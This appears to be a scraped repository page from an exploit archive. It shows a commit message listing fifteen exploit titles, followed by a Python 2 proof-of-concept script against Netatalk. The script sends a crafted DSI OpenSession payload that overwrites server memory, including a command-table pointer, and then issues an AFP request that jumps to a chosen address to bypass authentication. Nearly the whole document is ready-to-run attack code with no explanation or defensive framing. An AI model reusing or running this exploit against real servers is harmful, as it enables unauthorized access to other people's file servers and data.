1b31850a46
15 changes to exploits/shellcodes Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC) Google Chrome 70 - SQLite Magellan Crash (PoC) Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read Keybase keybase-redirector - '$PATH' Local Privilege Escalation Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC) Netatalk - Bypass Authentication Kubernetes - (Unauthenticated) Arbitrary Requests Kubernetes - (Authenticated) Arbitrary Requests WSTMart 2.0.8 - Cross-Site Scripting WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin) FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read PhpSpreadsheet < 1.5.0 - XML External Entity (XXE) Linux/x86 - Kill All Processes Shellcode (14 bytes)
44 lines
No EOL
1.7 KiB
Python
Executable file
44 lines
No EOL
1.7 KiB
Python
Executable file
import socket
|
|
import struct
|
|
import sys
|
|
if len(sys.argv) != 3:
|
|
sys.exit(0)
|
|
ip = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
|
|
sock.connect((ip, port))
|
|
dsi_payload = "\x00\x00\x40\x00" # client quantum
|
|
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
|
|
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
|
|
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
|
|
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
|
|
dsi_opensession = "\x01" # attention quantum option
|
|
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
|
|
dsi_opensession += dsi_payload
|
|
dsi_header = "\x00" # "request" flag
|
|
dsi_header += "\x04" # open session command
|
|
dsi_header += "\x00\x01" # request id
|
|
dsi_header += "\x00\x00\x00\x00" # data offset
|
|
dsi_header += struct.pack(">I", len(dsi_opensession))
|
|
dsi_header += "\x00\x00\x00\x00" # reserved
|
|
dsi_header += dsi_opensession
|
|
sock.sendall(dsi_header)
|
|
resp = sock.recv(1024)
|
|
print "[+] Open Session complete"
|
|
afp_command = "\x01" # invoke the second entry in the table
|
|
afp_command += "\x00" # protocol defined padding
|
|
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
|
|
afp_command += struct.pack("Q", 0x4295f0) # address to jump to
|
|
dsi_header = "\x00" # "request" flag
|
|
dsi_header += "\x02" # "AFP" command
|
|
dsi_header += "\x00\x02" # request id
|
|
dsi_header += "\x00\x00\x00\x00" # data offset
|
|
dsi_header += struct.pack(">I", len(afp_command))
|
|
dsi_header += '\x00\x00\x00\x00' # reserved
|
|
dsi_header += afp_command
|
|
print "[+] Sending get server info request"
|
|
sock.sendall(dsi_header)
|
|
resp = sock.recv(1024)
|
|
print resp
|
|
print "[+] Fin." |